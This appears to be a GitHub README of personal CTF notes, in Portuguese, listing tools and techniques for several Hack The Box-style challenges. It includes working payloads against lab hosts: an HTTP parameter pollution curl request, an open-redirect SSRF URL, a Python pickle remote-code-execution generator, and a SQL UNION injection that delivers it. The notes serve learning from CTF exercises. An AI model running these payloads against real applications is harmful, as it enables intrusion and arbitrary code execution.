Skip to content

GGontijo/CTF-s

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

24 Commits
 
 
 
 
 
 

Repository files navigation

Dicas e usos de ferramentas

Técnicas, Vulnerabilidades e Ferramentas que usei para referências em desafios futuros

Eternal Loop:

  • fcrackzip

Photon Lockdown:

  • unsquashfs

0xBOverchunked:

  • sqlmap

HTBank:

  • HTTP Parameter Polution (HPP):
    curl --location 'http://94.237.55.42:33198/api/withdraw' \
    --form 'account="0"' \
    --form 'amount="0"' \ # Precisa ser zero para o payload passar
    --form 'amount="1337"' #
    

Saturn:

  • SSRF (Server Side Request Forgery)

ProxyAsAService:

  • Open Redirect Attack
    http://94.237.60.170:33195/?url=@0.0.0.0:1337/debug/environment
    

ApacheBlaze:

RenderQuest:

C.O.P:

  • Pickle Remote Code Execution

    import pickle
    import base64
    import os
    
    payload = 'cp flag.txt application/static/.' # Payload
    
    class RCE:
        def __reduce__(self):
            return os.system, (payload,)
    
    if __name__ == '__main__':
        print(base64.urlsafe_b64encode(pickle.dumps(RCE())).decode('ascii'))
    
    Injetar payload:
    
    GET http://94.237.49.121:31295/view/' UNION SELECT 'gASVOwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjCBjcCBmbGFnLnR4dCBhcHBsaWNhdGlvbi9zdGF0aWMvLpSFlFKULg==
    

    Recuperar flag:

    GET http://94.237.49.121:31295/static/flag.txt
    

EasterBunny: